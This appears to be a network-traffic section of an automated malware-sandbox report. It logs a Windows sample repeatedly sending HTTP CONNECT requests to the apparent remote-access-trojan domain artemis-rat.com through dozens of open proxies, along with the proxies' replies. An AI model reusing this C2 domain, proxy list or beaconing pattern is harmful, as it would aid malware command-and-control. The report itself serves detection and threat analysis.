                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                              Mar 11, 2024 08:37:21.265650988 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                              Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              231192.168.2.45074651.75.126.150378477284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.014483929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              232192.168.2.450803104.27.26.29807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.014565945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.168888092 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              233192.168.2.450573160.16.90.3531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.014569044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.419493914 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              234192.168.2.4506035.196.111.30200607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.014569044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              235192.168.2.450740203.30.191.218807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.016827106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.171101093 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              236192.168.2.450550120.37.121.20990917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.017429113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.365550995 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              237192.168.2.450809104.20.198.49807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.017774105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.172198057 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              238192.168.2.44985372.206.181.10341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.017784119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              239192.168.2.450267120.234.203.17190027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.017918110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.733629942 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              240192.168.2.450814104.19.171.188807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.017920971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.172179937 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              241192.168.2.449855189.240.60.17190907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.018013000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.361706018 CET72INHTTP/1.1 200 Connection established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              242192.168.2.450822172.67.181.11807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.018014908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.172616005 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              243192.168.2.45057562.33.53.24831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.018261909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.842535019 CET536INHTTP/1.1 503 Service Unavailable
                                              Server: squid/3.5.27
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:28 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3796
                                              X-Squid-Error: ERR_DNS_FAIL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              244192.168.2.450824104.25.167.88807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.018631935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.173022032 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              245192.168.2.45065161.111.38.5807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.018913984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.326836109 CET507INHTTP/1.1 502 Proxy Error
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Server: Apache
                                              Content-Length: 341
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              246192.168.2.45073338.162.10.20931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.020317078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.451845884 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              247192.168.2.4509524.182.9.1084437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.020524025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              248192.168.2.449823103.140.34.6180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.021135092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.091839075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.183603048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366661072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.366508007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:54.381817102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:06.522500038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:08.002509117 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              249192.168.2.450656119.196.168.183807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.021147966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


